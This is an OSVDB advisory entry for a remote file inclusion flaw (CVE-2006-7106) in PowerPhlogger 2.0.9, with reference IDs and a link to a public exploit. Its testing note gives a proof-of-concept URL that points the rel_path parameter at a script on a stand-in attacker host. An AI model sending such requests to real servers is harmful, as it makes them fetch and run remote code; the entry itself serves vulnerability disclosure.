PowerPhlogger config.inc.php3 rel_path Variable Remote File Inclusion

2006-10-19T22:46:37
ID OSVDB:34681
Type osvdb
Reporter OSVDB
Modified 2006-10-19T22:46:37

Description

Manual Testing Notes

http://[target]/[Power Phlogger 2.0.9]/config.inc.php3?rel_path=http://[attacker]/Script.txt

References:

ISS X-Force ID: 29701 Generic Exploit URL: http://www.milw0rm.com/exploits/2602 CVE-2006-7106 Bugtraq ID: 20644 Bugtraq ID: 20638